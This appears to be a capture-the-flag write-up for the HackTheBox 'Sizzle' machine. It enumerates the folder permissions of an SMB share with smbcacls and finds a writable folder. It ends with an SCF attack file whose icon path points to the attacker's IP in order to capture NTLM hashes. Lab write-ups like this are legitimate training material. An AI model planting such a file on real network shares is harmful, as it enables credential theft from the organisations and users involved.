We need to check permissions of all the folder and sub folders. And see if we can read and write both to a directory.
We ll use For loop for this.

Making a list of all the directories in a folder.

➜  sizzle for i in $(ls); do echo $i; done
Accounting
Audit
Banking
CEO_protected
Devops
Finance
HR
IT
Infosec
Infrastructure
Legal
M&A
Marketing
R&D
Sales
Security
Tax
Users
ZZ_ARCHIVE
Copy

Save the output in a file.
The are the directories in the Department Shares share.
Now we need to traverse through all the folders inside them and check the permissions using smbcacls

creating a file.

find /mnt/htb/sizzle/ > ~/htb/sizzle/SMB/files.txt
Copy

Remove all the ./ before as the first character using vim or bash.

So the file should look like this ->

➜  SMB cat files.txt 
Accounting
Audit   
Banking 
Banking/Offshore
Banking/Offshore/Clients 
Banking/Offshore/Data
Banking/Offshore/Dev
Banking/Offshore/Plans
Banking/Offshore/Sites
CEO_protected 
Devops     
Finance  
HR        
HR/Benefits   
HR/Corporate Events
HR/New Hire Documents
HR/Payroll  
HR/Policies
----SNIP----
Copy

 for i in $(cat files.txt); do echo $i; smbcacls -N '//10.10.10.103/Department Shares' $i; done
Copy

ACL:Everyone:ALLOWED/OI|CI/FULL
We can write to the public folder.

When we can upload a file to a smb share we can try a SCF attack -> SCF(Shell command Files) files can be used to perform a limited set of operations such as showing the Windows desktop or opening a Windows explorer. However a SCF file can be used to access a specific UNC path which allows the penetration tester to build an attack. The code below can be placed inside a text file which then needs to be planted into a network share.

This attack creates a alias, say a icon file and tells that the icon file is located to this IP address Our IP and when the server reaches to our ip we ll capture its hash.
https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/

Attack.scf ->

[Shell]
Command=2
IconFile=\\10.10.14.10\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop
Copy